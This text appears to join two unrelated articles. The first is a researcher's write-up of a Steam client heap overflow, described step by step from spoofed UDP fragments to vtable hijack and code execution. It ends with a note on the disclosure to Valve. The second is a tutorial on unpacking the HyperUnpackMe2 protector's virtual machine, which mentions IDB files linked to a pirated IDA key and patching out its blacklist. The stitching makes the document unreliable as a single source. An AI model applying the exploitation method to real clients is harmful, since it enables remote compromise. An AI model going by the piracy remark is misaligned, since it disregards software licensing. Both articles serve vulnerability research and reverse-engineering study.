The vulnerability exists within the RecvFragment method of the CUDPConnection class. No symbols are present in the release version of the steamclient library, however a search through the strings present in the binary will reveal a reference to “CUDPConnection::RecvFragment” in the function of interest. This function is entered when the client receives a UDP packet containing a Steam datagram of type 0x6 (Datagram fragment).

1. The function starts by checking the connection state to ensure that it is in the “Connected” state.
2. The data_len field within the Steam datagram is then inspected to ensure it contains fewer than a seemingly arbitrary 0x20000060 bytes.
3. If this check is passed, it then checks to see if the connection is already collecting fragments for a particular datagram or whether this is the first packet in the stream.

Figure 1

4. If this is the first packet in the stream, the split_count field is then inspected to see how many packets this stream is expected to span
5. If the stream is split over more than one packet, the seq_no_of_first_pkt field is inspected to ensure that it matches the sequence number of the current packet, ensuring that this is indeed the first packet in the stream.
6. The data_len field is again checked against the arbitrary limit of 0x20000060 and also the split_count is validated to be less than 0x709bpackets.

Figure 2

7. If these assertions are true, a Boolean is set to indicate we are now collecting fragments and a check is made to ensure we do not already have a buffer allocated to store the fragments.

Figure 3

8. If the pointer to the fragment collection buffer is non-zero, the current fragment collection buffer is freed and a new buffer is allocated (see yellow box in Figure 4 below). This is where the bug manifests itself. As expected, a fragment collection buffer is allocated with a size of data_lenbytes. Assuming this succeeds (and the code makes no effort to check – minor bug), then the datagram payload is then copied into this buffer using memmove, trusting the field packet_len to be the number of bytes to copy. The key oversight by the developer is that no check is made that packet_len is less than or equal to data_len. This means that it is possible to supply a data_len smaller than packet_len and have up to 64kb of data (due to the 2-byte width of the packet_len field) copied to a very small buffer, resulting in an exploitable heap corruption.

Figure 4

Exploitation

This section assumes an ASLR work-around is present, leading to the base address of steamclient.dll being known ahead of exploitation.

SPOOFING PACKETS

In order for an attacker’s UDP packets to be accepted by the client, they must observe an outbound (client->server) datagram being sent in order to learn the client/server IDs of the connection along with the sequence number. The attacker must then spoof the UDP packet source/destination IPs and ports, along with the client/server IDs and increment the observed sequence number by one.

MEMORY MANAGEMENT

For allocations larger than 1024 (0x400) bytes, the default system allocator is used. For allocations smaller or equal to 1024 bytes, Steam implements a custom allocator that works in the same way across all supported platforms. In-depth discussion of this custom allocator is beyond the scope of this blog, except for the following key points:

  1. Large blocks of memory are requested from the system allocator that are then divided into fixed-size chunks used to service memory allocation requests from the steam client.
  2. Allocations are sequential with no metadata separating the in-use chunks.
  3. Each large block maintains its own freelist, implemented as a singly linked list.
  4. The head of the freelist points to the first free chunk in a block, and the first 4-bytes of that chunk points to the next free chunk if one exists.

Allocation

When a block is allocated, the first free block is unlinked from the head of the freelist, and the first 4-bytes of this block corresponding to the next_free_block are copied into the freelist_head member variable within the allocator class.

Deallocation

When a block is freed, the freelist_head field is copied into the first 4 bytes of the block being freed (next_free_block), and the address of the block being freed is copied into the freelist_head member variable within the allocator class.

ACHIEVING A WRITE-WHAT-WHERE PRIMITIVE

The buffer overflow occurs in the heap, and depending on the size of the packets used to cause the corruption, the allocation could be controlled by either the default Windows allocator (for allocations larger than 0x400 bytes) or the custom Steam allocator (for allocations smaller than 0x400 bytes). Given the lack of security features of the custom Steam allocator, I chose this as the simpler of the two to exploit.

Referring back to the section on memory management, it is known that the head of the freelist for blocks of a given size is stored as a member variable in the allocator class, and a pointer to the next free block in the list is stored as the first 4 bytes of each free block in the list.

The heap corruption allows us to overwrite the next_free_block pointer if there is a free block adjacent to the block that the overflow occurs in. Assuming that the heap can be groomed to ensure this is the case, the overwritten next_free_block pointer can be set to an address to write to, and then a future allocation will be written to this location.

USING DATAGRAMS VS FRAGMENTS

The memory corruption bug occurs in the code responsible for processing datagram fragments (Type 6 packets). Once the corruption has occurred, the RecvFragment() function is in a state where it is expecting more fragments to arrive. However, if they do arrive, a check is made to ensure:

fragment_size + num_bytes_already_received < sizeof(collection_buffer)

This will obviously not be the case, as our first packet has already violated that assertion (the bug depends on the omission of this check) and an error condition will be raised. To avoid this, the CUDPConnection::RecvFragment() method must be avoided after memory corruption has occurred.

Thankfully, CUDPConnection::RecvDatagram() is still able to receive and process type 7 (Datagram) packets sent whilst RecvFragment() is out of action and can be used to trigger the write primitive.

THE ENCRYPTION PROBLEM

Packets being received by both RecvDatagram() and RecvFragment() are expected to be encrypted. In the case of RecvDatagram(), the decryption happens almost immediately after the packet has been received. In the case of RecvFragment(), it happens after the last fragment of the session has been received.

This presents a problem for exploitation as we do not know the encryption key, which is derived on a per-session basis. This means that any ROP code/shellcode that we send down will be ‘decrypted’ using AES256, turning our data into junk. It is therefore necessary to find a route to exploitation that occurs very soon after packet reception, before the decryption routines have a chance to run over the payload contained in the packet buffer.

ACHIEVING CODE EXECUTION

Given the encryption limitation stated above, exploitation must be achieved before any decryption is performed on the incoming data. This adds additional constraints, but is still achievable by overwriting a pointer to a CWorkThreadPool object stored in a predictable location within the data section of the binary. While the details and inner workings of this class are unclear, the name suggests it maintains a pool of threads that can be used when ‘work’ needs to be done. Inspecting some debug strings within the binary, encryption and decryption appear to be two of these work items (E.g. CWorkItemNetFilterEncryptCWorkItemNetFilterDecrypt), and so the CWorkThreadPool class would get involved when those jobs are queued. Overwriting this pointer with a location of our choice allows us to fake a vtable pointer and associated vtable, allowing us to gain execution when, for example, CWorkThreadPool::AddWorkItem() is called, which is necessarily prior to any decryption occurring.

Figure 5 shows a successful exploitation up to the point that EIP is controlled.

Figure 5

From here, a ROP chain can be created that leads to execution of arbitrary code. The video below demonstrates an attacker remotely launching the Windows calculator app on a fully patched version of Windows 10.

Conclusion

If you’ve made it to this section of the blog, thank you for sticking with it! I hope it is clear that this was a very simple bug, made relatively straightforward to exploit due to a lack of modern exploit protections. The vulnerable code was probably very old, but as it was otherwise in good working order, the developers likely saw no reason to go near it or update their build scripts. The lesson here is that as a developer it is important to periodically include aging code and build systems in your reviews to ensure they conform to modern security standards, even if the actual functionality of the code has remained unchanged. The fact that such a simple bug with such serious consequences has existed in such a popular software platform for so many years may be surprising to find in 2018 and should serve as encouragement to all vulnerability researchers to find and report more of them!

As a final note, it is worth commenting on the responsible disclosure process. This bug was disclosed to Valve in an email to their security team (security@valvesoftware.com) at around 4pm GMT and just 8 hours later a fix had been produced and pushed to the beta branch of the Steam client. As a result, Valve now hold the top spot in the (imaginary) Context fastest-to-fix leaderboard, a welcome change from the often lengthy back-and-forth process often encountered when disclosing to other vendors.

A page detailing all updates to the Steam client can be found at https://store.steampowered.com/news/38412/

Defeating HyperUnpackMe2 With an IDA Processor Module

1.0 Introduction

This article is about breaking modern executable protectors. The target, a crackme known as HyperUnpackMe2, is modern in the sense that it does not follow the standard packer model of yesteryear wherein the contents of the executable in memory, minus the import information, are eventually restored to their original forms.

Modern protectors mutilate the original code section, use virtual machines operating upon polymorphic bytecode languages to slow reverse engineering, and take active measures to frustrate attempts to dump the process. Meanwhile, the complexity of the import protections and the amount of anti-debugging measures has steadily increased.

This article dissects such a protector and offers a static unpacker through the use of an IDA processor module and a custom plugin. The commented IDB files and the processor module source code are included. In addition, an appendix covers IDA processor module construction. In short, this article is an exercise in overkill.

NOTE: all code snippets beginning with «ROM:» come from the disassembled VM code; all other snippets come from the protected binary.

HyperUnpackMe2 is provided as an ancillary to this article and includes:

  • codeseg—lightly—commented.idb: IDB of Virtual Machine (VM)
  • dumped.exe: Statically unpacked executable
  • Notepad.idb: IDB of packed executable
  • processor_module_source.zip: Source code for IDA processor module
  • th.w32: IDA processor module

The processor module (th.w32) belongs in %IDADIR%\procs. It requires IDA 5.0, as do both of the IDBs. Although I own IDA 5.0, these IDBs are linked with the pirated 5.0 key. This is due to the fact that IDB files contain the majority of your personal keyfile. Hence, the IDBs will stop working under 5.1, unless you patch out the blacklist code (which is trivial). If you are a legitimate customer of IDA and would like IDBs for a later version, contact me under the information at the bottom of the article.

 1.1 Modern Protectors

Protectors of generations past mainly compress/encrypt the original contents of the executable’s sections; redirect the entrypoint to a new section that contains the decompression/decryption stub mixed in with anti-disassembly and anti-debugging techniques; strip the import information at protect-time and rebuild the import address tables at runtime; and finally transfer control back to the original entrypoint. In other words, while the sections’ contents are modified on disk, they are mostly (with the exception of the import information) restored to their original state before execution is transferred back to the original program. Although there are some protectors which are exceptions, this is the basic idiom.

To unpack such protectors, execution is traced back to the original entrypoint, the process is dumped to create a new executable, and the import information is rebuilt. ImpRec and a sufficiently patched debugger are all that is needed to unpack protectors of this variety.

Rather than having an unmolested image in memory, new protectors are applying transformations to the original code in an effort to thwart understanding it and to make dumping the executable more difficult. Examples include converting portions of the code into proprietary byte-code formats which are executed by an embedded interpreter (so-called virtualization, virtual machines or VMs) and copying portions of the code elsewhere in the process’ address space (so-called stolen bytes, stolen functions). These techniques are now mainstream in all areas of software protection, from crackmes and commercial packers to industrial-grade protections.

 1.2 Transformations Applied by HyperUnpackMe2 to the Original Code

HyperUnpackMe2 extensively modifies the original code, and the entirety of the packer code is executed in a virtual machine. The anti-debugging is heavy and some of it is novel.

By quickly examining the code at the beginning of the binary, we notice the following:

  • Direct inter-module API calls are replaced with int 3 / 5x NOP. It is not known a priori whether these are fixed up directly, or whether they actually require a trip through a SEH. This could be problematic: think about Armadillo. Thunks to APIs are similarly obfuscated. The relevant data in the original IIDs and IATs have been zeroed.
  • Instructions which reference imports without calling them directly, i.e.
        .text:01004462  mov     esi, ds:__imp__lstrcpyW@8 ; lstrcpyW(x,x)
    

    have been replaced with zeroes. However, the surrounding context remains the same:

        TheHyper:0103A44D    push    ebx
        TheHyper:0103A44E    mov     ebx, [esp+8]
        TheHyper:0103A452    push    esi
        TheHyper:0103A453    db 0,0,0,0,0,0
        TheHyper:0103A459    push    edi
        TheHyper:0103A45A    push    _szAnsiText
        TheHyper:0103A460    push    ebx
        TheHyper:0103A461    call    esi
    

    So clearly, the missing instructions must be re-inserted (in some form) into the code before it’ll execute properly. Perhaps this happens via a trip through the virtualizer, perhaps they’re patched directly, perhaps a SEH-triggering event is patched in. Without further analysis, we have no way of knowing.

  • Intra-module calls are replaced with call $+5. It seems likely that these references are directly fixed up prior to execution; this turns out not to be the case (the ‘directly’ part is false).
  • Long jump instructions have had their targets replaced with a zero dword.
        .text:010023CE E9 00 00 00 00    jmp     $+5
    

    Again, it’s unknown what sort of obfuscation is being applied here.

  • Functions have been stolen, with zeroes left behind in place of the original code. These functions have been deposited towards the end of the packer section.
        .text:01001C5B                   ; __stdcall SetTitle(x)
        .text:01001C5B 00                _SetTitle@4     db    0
        .text:01001C5C 00                                db    0
        .text:01001C5D 00                                db    0
        .text:01001C5E 00                                db    0
    

 

 2.0 Virtual Machines

Although VM assembly languages are often simple, VMs pose a challenge because they severely dilute the value of existing tools. Standard dynamic analysis with a debugger is possible, but very tedious because of the low ratio of signal to noise: one traces the same VM parsing / dispatching code over and over again. Static analysis is broken because each different VM has a different instruction encoding format (and this can be polymorphic). Patching the VM program requires a familiarity with the instruction set that must be gained through analysis of the VM parser. Basically, reverse engineering a VM with the common tools is like reverse engineering a scripted installer without a script decompiler: it’s repetitious, and the high-level details are obscured by the flood of low-level details.

 2.1 General Setup of VM Protections

The virtual machine needs an environment to execute in. This is generally implemented as a structure, hereinafter «the VM context structure». Each VM is different, but of the ones I’ve encountered thus far, each is based on the concept of a register architecture, and so the VM context structures typically consist of registers, flags, and various pointers (e.g. stack, maybe a heap of some sort, or a static data section).

Before the first instruction is executed, the VM context structure is allocated, and the registers and pointers are initialized, which usually involves allocating memory (perhaps on the host stack) for the VM stack.

After initialization, the archetypal VM enters into a loop which:

  • Decodes instructions at VM_context.EIP,
  • Performs the commands specified by the instruction, and then
  • Calculates the next EIP.

The process of execution usually involves examining the first byte of the instruction and determining which function/switch statement case to execute.

Eventually, the VM reaches some stop condition, and either exits or transfers control back to the native processor.

 3.0 Description of HyperUnpackMe2’s VM Harness

The HyperUnpackMe2 VM context structure contains sixteen dword registers, including ESP, which can each be accessed as a little-endian byte, word, or dword. There is an EIP register and an EFLAGS register as well. There is a pointer to the VM data (which is where EIP begins), and its length. The structure is zeroed upon creation. Its declaration follows. See the included x86 IDB for all of the gory details.

    struct TH_registers
    {
        unsigned long rESP;    unsigned long r1;    unsigned long r2;
        unsigned long r3;      unsigned long r4;    unsigned long r5;
        unsigned long r6;      unsigned long r7;    unsigned long r8;
        unsigned long r9;      unsigned long rA;    unsigned long rB;
        unsigned long rC;      unsigned long rD;    unsigned long rE;
        unsigned long rF;
    };
    
    struct TH_context
    {
        unsigned char *vm_data;
        unsigned long vm_data_len;
        unsigned char *EIP;
        unsigned long EFLAGS;
        TH_registers registers;
        TH_keyed_mem keyed_mem_array[502];
        unsigned long stack[0x9000/4];
    };

 

 3.1 Instruction Encoding

The HyperUnpackMe2 VM consists of 36 instructions, split up into five groups. Each group has a different instruction encoding format, with a few commonalities. The commands understood by the VM are the following (non-obvious ones will be explained in detail in subsequent sections):

  • Group One: Two-operand arithmetic instructions:
    • mov, add, sub, xor, and, or, imul, idiv, imod, ror, rol, shr, shl, cmp
  • Group Two: One-operand arithmetic and general instructions:
    • push, pop, inc, dec, not
  • Group Three: One-operand control flow instructions:
    • jmp, jz, jnz, jge, jg, jle, jl, vmcall, x86call
  • Group Four: Memory-related instructions:
    • valloc, vfree, halloc, hfree
  • Group Five: Miscellaneous instructions:
    • getefl, getmem, geteip, getesp, retd, stop

The VM itself is heavily based on the x86 architecture, as evident from the following snippets:

    TheHyper:0104A159 VM_set_flags_dword:
    TheHyper:0104A159                 cmp     [edi], esi
    TheHyper:0104A15B                 pushf
    TheHyper:0104A15C                 pop     [eax+VM_context_structure.EFLAGS]
    
    TheHyper:0104A316 VM_jz:
    TheHyper:0104A316                 push    [eax+VM_context_structure.EFLAGS]
    TheHyper:0104A319                 popf
    TheHyper:0104A31A                 jnz     short loc_104A31F
    TheHyper:0104A31C                 mov     [eax+VM_context_structure.EIP], edi
    TheHyper:0104A31F loc_104A31F:
    TheHyper:0104A31F                 jmp     short VM_dispatcher_13h_locret

The VM is using the host processor’s flags in a very literal fashion. Group one and two, and to some extent group three, instructions are implemented very thinly on top of existing x86 instructions, reflecting the fundamental similarity of this virtual processor to it.

 3.2 X86 <-> VM Crossover

The x86call instruction, depicted below, switches the host ESP with the VM ESP, and transfers control to the x86 code pointed to by EDI (what EDI is depends on the specifics of the instruction’s encoding). The result of the function call is placed in virtual register #A. We’ll find out later that this functionality is only ever used to call small functions associated with the protector, so we don’t have to worry about alternative calling conventions and the clobbering of EDX and EBP by the function.

The switching of the host ESP with the VM ESP signifies that parameters to x86 functions are pushed onto the VM stack in the same order and manner as they would be if the calls were being made natively.

    TheHyper:0104A36A    mov     esi, esp
    TheHyper:0104A36C    mov     edx, [eax+VM_context_structure.VM_registers.rESP]
    TheHyper:0104A36F    mov     esp, edx
    TheHyper:0104A371    call    edi
    TheHyper:0104A373    mov     edx, [ebp+arg_0]
    TheHyper:0104A376    mov     [edx+VM_context_structure.VM_registers.rA], eax
    TheHyper:0104A379    mov     esp, esi

The stop instruction in group five, depicted below, is suspicious and looks like it’s used to transfer control back to OEIP. EBP, the frame pointer, points to the saved frame pointer coming into the function, which is the first thing pushed after the return address of the caller. Therefore, [ebp+4] is the return address.

    TheHyper:0104A69F    cmp     cl, 0FFh
    TheHyper:0104A6A2    jnz     short go_on_parsing
    TheHyper:0104A6A4    popa
    TheHyper:0104A6A5    mov     eax, [ebp+var_4_VM_context_structure]
    TheHyper:0104A6A8    mov     eax, [eax+VM_context_structure.VM_registers.rA]
    TheHyper:0104A6AB    mov     [ebp+4], eax    ; [ebp+4] = return address
    TheHyper:0104A6AE    leave
    TheHyper:0104A6AF    retn    8

We thus expect that the packer will return to OEIP by using the stop instruction, with OEIP in virtual register #A.

 3.3 Memory Keying

The virtual machine also maintains an associative array of memory locations. Each block of memory that it tracks has a keying tag associated with it. There are native functions to add memory pointers with keys, retrieve a pointer by passing in its associated key, remove a pointer given its key, and update a pointer given a key and a new block of memory to point to. Not all of these functions are accessible through the instruction set; they seem to be for debugging purposes.

Some of the memory blocks contain non-obfuscated x86 code, some obfuscated, some contain VM code, and some contain data.

The internal data structure for a keyed memory entry looks like the following:

    struct TH_keyed_mem
    {
        unsigned char *ptr;
        unsigned long key;
    };

Analyzing the functions which manipulate this structure can be slightly confusing due to negative structure displacements:

    TheHyper:0104A3DC    mov     [esi], edx           ; key
    TheHyper:0104A3DE    mov     [esi-4], eax         ; ptr
    TheHyper:0104A3E1    add     dword ptr [esi-4], 8 ; ptr

3.3.1 Initializing the Associative Array

During initialization, the VM calls a function which scans the VM’s data looking for all occurrences of the dword ‘$$$$’. For each instance found, it treats the next dword as the key, and takes the address of the dword following that as the pointer.

    ['$$$$'][4-byte key]^[arbitrary data]  ^:  pointer

3.3.2 Using the Associative Array

In the instruction set, group four specifically, there are two pairs of instructions which add and remove memory blocks from the internal associative array. The first pair allocates memory with VirtualAlloc, and the second pair uses HeapAlloc. There is no protection in the VM against attempting to de-allocate a block which wasn’t allocated in the first place.

Group five contains an instruction, getmem, to fetch a memory block given a key. Group three, the control-flow transfer instructions, can take memory keys as arguments. In other words, jmp/jcc key will transfer control into the memory region pointed at by the key. In fact, the first instruction executed by the VM is of the form jmp key, and this is the primary form of control-flow transfer in the VM.

 4.0 Static Analysis of HyperUnpackMe2’s VM Code

Based on the analysis of the VM dispatching harness, I constructed an IDA processor module to examine the code inside of the VM — dead and natively. As such, the anti-debugging tricks are generally beyond the scope of this article, but a brief discussion can be found in appendix A. See appendix B for information about writing IDA processor modules.

Beyond the anti-debugging, there’s a lot of anti-dump protection in this packer. The main «tricks» all involve the redirection of certain aspects of normal code execution.

  • The stolen functions are copied into VirtualAlloc’ed memory.
  • The API calls and API-referencing instructions point to obfuscated stubs which eventually redirect to their intended targets, which are actually in copies of the referenced DLLs, not the originals. There are 73 kilobytes’ worth of obfuscated stubs in the packer section.
  • Relative jumps and calls travel through tiny stub functions in VirtualAlloc’ed memory onto their destinations.

Further, all API references are changed to relatively-addressed varieties instead of direct references, i.e. 0xE8 [displacement to import] (call import_address) instead of 0xFF 0x15 [IAT entry] (call dword ptr [IAT entry]).

The point is to make dumping as hard as possible by creating a rigid reliance on the exact layout of the process’ address space as it exists during that particular invocation (including the VirtualAlloc’ed memory regions and copied DLLs), and by removing any trace of the import table.

The following sections fill in the gaps (no pun intended) left in section 1.2 by describing precisely what happens under the covers of the VM. In the course of examination, we find that the fixups for each type take place in clusters, with similar code being used repeatedly to perform the same type of fixup. This turns out to be all of the information needed to break the protection, resulting in an automatic, static unpacker for any binary packed with it (of which there are no more — TheHyper informed me that the protector was lost due to a disk crash).

 4.1 Stolen Functions

The first thing we’ll need to deal with are the missing functions. As we can see in the following snippet, it turns out that the functions are copied into allocated memory, and a long jump into the relevant function in allocated memory is inserted at the site of the function in the original code section. It should be noted that the stolen functions are still subject to the modifications described in subsequent sections.

    .text:01001B9A    ; __stdcall UpdateStatusBar(x)
    .text:01001B9A    _UpdateStatusBar@4 db 0B7h dup(0)
    
    ROM:0103AFAA    mov     r0B, 1038A82h ; location of function in the VM section
    ROM:0103AFB2    mov     r06, 0B7h     ; notice this matches up with the
    ROM:0103AFBA    push    r06           ; size of the stolen function above
    ROM:0103AFBD    push    r0B
    ROM:0103AFC0    push    r0F           ; points to a block of allocated mem
    ROM:0103AFC3    x86call x86_memcpy
    ROM:0103AFC9    add     rESP, 0Ch
    ROM:0103AFD1    mov     r0B, 1001B9Ah ; address of UpdateStatusBar
    ROM:0103AFD9    mov     r0E, r0F
    ROM:0103AFDD    sub     r0E, r0B
    ROM:0103AFE1    sub     r0E, 5        ; r0E is the displacement of the jmp
    ROM:0103AFE9    add     r0F, r06      ; point after the copied function
    ROM:0103AFED    mov     [r0Bb], 0E9h  ; assemble a long jmp
    ROM:0103AFF2    inc     r0B
    ROM:0103AFF5    mov     [r0B], r0E    ; write the displacement for the jmp

Locating these copies is easy enough: references to x86_memcpy following the final memory key are the ones which copy the stolen functions into VirtualAlloc’ed memory. We can easily extract the source of the copy and the destination of the write and copy the function back into its original real estate within the binary.

While we’re on the subject, when fixups are made to functions which have been copied into allocated memory, they are made as a displacement against the beginning of that memory. I.e. we might see a fixup of a long jump made against address [displacement + 100h]. Thus, in order to know where in the original binary this long jump is, we need to retain information about where the functions in the original binary are situated in the allocated memory.

For example:

    Displacement   0h into allocated memory -> 1001B9Ah
    Displacement  B7h into allocated memory -> 1001EEFh
    Displacement 11Dh into allocated memory -> 100696Ah

Then, when we see one of these arbitrary displacements, we can map it to a location in the original binary by looking for the greatest lower bound in the set of displacements. I.e. for displacement C0h, this is +9h into the function with displacement B7h, and is therefore at the address 1001EEFh + 9h. Here’s an example:

    ROM:01049920    getmem  r0B, 10000h
    ROM:01049926    mov     r0B, [r0B]
    ROM:0104992A    add     r0B, 639h    ; where does this point?

 

 4.2 Long Jump Obfuscation

 

    .text:010019DF E9 00 00 00 00                    jmp     $+5

Here we see, in the x86 IDB, an example of the jmp obfuscation. What actually happens here, at runtime, is that a chunk of memory is allocated, and gets filled with what looks like API thunk functions. The jmps in the binary are patched to jmp into the allocated memory, which subsequently jmps to the correct location in the binary. The following VM code illustrates this:

    ROM:0104840F    valloc  195h, 6       ; allocate 0x195 bytes of vmem under the
    ROM:01048418    getmem  r0E, 6        ; tag 0x6
                    
    ROM:0104841E    mov     r0F, 10019DFh ; see above:  same address
    ROM:01048426    mov     r0D, r0F
    ROM:0104842A    add     r0D, 5        ; point after the jump
    ROM:01048432    mov     r09, r0E      ; point at the currently-assembling stub
    ROM:01048436    sub     r09, r0D      ; calculate the displacement for the jmp
    ROM:0104843A    inc     r0F           ; point to the 0 dword in e9 00000000
    ROM:0104843D    mov     [r0F], r09    ; insert reference to allocated memory
    ROM:01048441    mov     r0B, 1001AE1h ; this is the target of the jmp
    ROM:01048449    mov     r0C, r0E
    ROM:0104844D    add     r0C, 5        ; calculate address after allocated jmp
    ROM:01048455    sub     r0B, r0C      ; calculate displacement for jmp
    ROM:01048459    mov     [r0Eb], 0E9h  ; build jmp in VirtualAlloc'ed memory
    ROM:0104845E    inc     r0E
    ROM:01048461    mov     [r0E], r0B    ; insert address into jmp
    ROM:01048465    add     r0E, 4

This is the general code sequence used to fix up the jumps when the function to be fixed up remains in the original binary’s sections. When the function has been copied into memory, as described in the previous section, the code changes slightly: r0F and r0B’s addresses are the displacements described previously. For example, the code at -41E and -441 are replaced with these snippets, respectively:

    ROM:010498F3    getmem  r0F, 10000h
    ROM:010498F9    mov     r0F, [r0F]
    ROM:010498FD    add     r0F, 469h
    
    ROM:01049920    getmem  r0B, 10000h
    ROM:01049926    mov     r0B, [r0B]
    ROM:0104992A    add     r0B, 639h

Given the sequences above, and making use of the stolen address -> real address mapping, it’s trivial to cut out the middleman and insert the proper displacements into the correct dword locations. In the code above, we retrieve the dword operands from -41E and -441 and simply fix the jumps ourselves.

 4.3 Calls-To Obfuscation

These are handled in a very similar fashion as the jump obfuscation: the code to fix up the calls-to references is exactly the same as the jump obfuscation fixups. The calls also go through stubs in allocated memory which jmp to their proper destinations.

    .text:01001C51 6A 00             push    0
    .text:01001C53 E8 00 00 00 00    call    $+5
    .text:01001C58 C2 1C 00          retn    1Ch
    
    ROM:0104419A    valloc  3F2h, 5       ; allocate 0x3f2 bytes of memory under
    ROM:010441A3    getmem  r0E, 5        ; the tag 0x5
    
    ROM:010441A9    mov     r0F, 1001C53h ; address of call to be fixed up (above)
    ROM:010441B1    mov     r0D, r0F
    ROM:010441B5    add     r0D, 5        ; point after the call
    ROM:010441BD    mov     r09, r0E      ; r09 points to the allocated jmp stub
    ROM:010441C1    sub     r09, r0D
    ROM:010441C5    inc     r0F
    ROM:010441C8    mov     [r0F], r09    ; insert the proper displacement
    ROM:010441CC    mov     r0B, 1001B9Ah ; we would be calling this address
    ROM:010441D4    mov     r0C, r0E
    ROM:010441D8    add     r0C, 5
    ROM:010441E0    sub     r0B, r0C      ; calculate displacement
    ROM:010441E4    mov     [r0Eb], 0E9h  ; form the long jmp in allocated memory
    ROM:010441E9    inc     r0E
    ROM:010441EC    mov     [r0E], r0B
    ROM:010441F0    add     r0E, 4

Notice that, in this case, a call from a non-stolen function is being fixed up to call a non-stolen function: the addresses on lines -1A9 and -1CC are hard-coded within the binary. When a call in a stolen function is fixed up to call another function, the beginning of the above code sequence is different: it uses the getmem idiom, as we saw previously. The code at -1A9 becomes:

    ROM:010441F8    getmem  r0F, 10000h
    ROM:010441FE    mov     r0F, [r0F]
    ROM:01044202    add     r0F, 20Dh

However, the destination address is not loaded via getmem, because as we saw previously, calls to stolen functions are routed to their destinations via these jumps. I.e. calls to stolen functions behave just like calls to the original functions.

Recovering the proper displacement from the caller to the callee is as simple as it was for the jumps, because the code is identical, so see the closing remarks for the last section on how to fix up these calls.

 4.4 Import Obfuscation

Here’s a sample of the import redirection. Instead of referencing the imports directly, the jmp/call-to-import instructions are patched to reference locations such as these:

    TheHyper:01021524    pushf
    TheHyper:01021525    pusha
    TheHyper:01021526    call    sub_1021548
    
    TheHyper:01021548    pop     eax
    TheHyper:01021549    add     eax, 16h
    TheHyper:0102154C    jmp     eax

This sort of thing goes on for a while (six layers for this one) with some random junked garbage interspersed before eventually redirecting control to the original import:

    TheHyper:010215DE 61                popa
    TheHyper:010215DF 9D                popf
    TheHyper:010215E0 E9 00 00 00 00    jmp     $+5

4.4.1 IAT Reconstruction

Believe it or not, the first thing that HyperUnpackMe2 does when it really gets down to business is to correctly rebuild the original IAT.

First, the DLL names are retrieved from memory byte-by-byte. The names are not stored contiguously, but rather, the bytes corresponding to the DLL names are randomly mixed together. The DLL is then LoadLibraryA’d.

    ROM:01026058    mov     r04, 1013000h  ; point to beginning of packer section
    ROM:0102607B    getmem  r05, dword_101382D
    ROM:01026081    mov     r0B, r09
    ROM:01026085    mov     r06, r04
    ROM:01026089    add     r06, 41Ch
    ROM:01026091    mov     [r0Bb], [r06b] ; copy byte of DLL name from 0x101341c
    ROM:01026095    inc     r0B
    ROM:01026098    mov     r06, r04
    ROM:0102609C    add     r06, 93h
    ROM:010260A4    mov     [r0Bb], [r06b] ; copy byte of DLL name from 0x1013093
    
    ; idiom repeats a variable number of times
    
    ROM:010260A8    inc     r0B
    ROM:0102617C    mov     [r0Bb], 0
    ROM:01026181    push    r09
    ROM:01026184    x86call r0C                 ; LoadLibraryA
    ROM:01026186    add     rESP, 4

Next, the entire DLL’s address space is copied into a freshly-allocated chunk of memory. Yes, you read that right. The DLL’s SizeOfImage is used as the size parameter to VirtualAlloc, and then the entire DLL is memcpy’d into it the result. This is responsible for a huge bloat in the memory footprint. I didn’t think that this trick would work, but the crackme does run, after all. Personal correspondence with TheHyper reveals that this is why the crackme only runs on XP SP2 (although I haven’t investigated why — help me out here, Alex?).

The following code illustrates the process:

    ROM:0102618E    push    r09
    ROM:01026191    push    r0B
    ROM:01026194    push    r0D
    ROM:01026197    mov     r09, r0A
    ROM:0102619B    getmem  r0A, g_Copy_Of_Kernel32_Address_Space
    ROM:010261A1    mov     r0A, [r0A]
    ROM:010261A5    push    kernel32_hashes_VirtualAlloc
    ROM:010261AB    push    r0A
    ROM:010261AE    vmcall  API__GetProcAddress
    ROM:010261B4    mov     r0D, r0A
    ROM:010261B8    mov     r0B, r09
    ROM:010261BC    add     r0B, 3Ch
    ROM:010261C4    mov     r0B, [r0B]
    ROM:010261C8    add     r0B, r09
    ROM:010261CC    add     r0B, 50h
    ROM:010261D4    mov     r0B, [r0B]          ; retrieve this DLL's SizeOfImage
    ROM:010261D8    push    40h
    ROM:010261DE    push    1000h
    ROM:010261E4    push    r0B
    ROM:010261E7    push    0
    ROM:010261ED    x86call r0D                 ; allocate that much memory
    ROM:010261EF    add     rESP, 10h
    ROM:010261F7    mov     r03, r0A
    ROM:010261FB    mov     [r05], r0A
    ROM:010261FF    push    r0B
    ROM:01026202    push    r09
    ROM:01026205    push    r0A
    ROM:01026208    x86call x86_memcpy          ; copy DLL's address space
    ROM:0102620E    add     rESP, 0Ch
    ROM:01026216    pop     r0D
    ROM:01026219    pop     r0B
    ROM:0102621C    pop     r09

Next, the imported APIs are loaded, but not in the normal way. The protector includes a VM-function that I’ve called API__GetProcAddress, which takes a pseudo-HMODULE and a shellcode-like API hash as arguments. The pseudo-HMODULE is the address of the memory that the DLL was copied into above. Thus, the addresses returned by this function reside in the copied DLL bodies, and not the originals.

API__GetProcAddress works by iterating through the DLL’s exports and hashing each function’s name, stopping when it finds the corresponding hash that was passed in as an argument. It then returns the address of that function.

This makes it harder for dynamic tools to identify which APIs are actually being used: after all, the API addresses are not contained within a loaded module.

The hashes and their locations in the original IAT are retrieved from the jumble of data at the beginning of the packer section in a similar fashion as the assembling of the DLL names. Additionally, the address at which the resolved import belongs in the original IAT entries is also assembled from scattered data.

    ROM:0102621F    xor     r07, r07    ; r07 = hash
    ROM:01026223    mov     r06, r04
    ROM:01026227    add     r06, 12h
    ROM:0102622F    mov     r05, [r06]
    ROM:01026233    and     r05, 0FFh
    ROM:0102623B    or      r07, r05    ; get a single byte of the hash
    ROM:0102623F    ror     r07, 8
    
    ; idiom repeats three times
    
    ROM:010262B3    xor     r08, r08    ; r08 = where to put the resolved import
    ROM:010262B7    mov     r06, r04
    ROM:010262BB    add     r06, 5C7h
    ROM:010262C3    mov     r05, [r06]
    ROM:010262C7    and     r05, 0FFh
    ROM:010262CF    or      r08, r05
    ROM:010262D3    ror     r08, 8
    
    ; idiom repeats three times
    
    ROM:01026347    push    r07
    ROM:0102634A    push    r03         ; point at copied DLL
    ROM:0102634D    vmcall  API__GetProcAddress
    ROM:01026353    add     r08, 1000000h
    ROM:0102635B    mov     [r08], r0A  ; store resolved address back into IAT

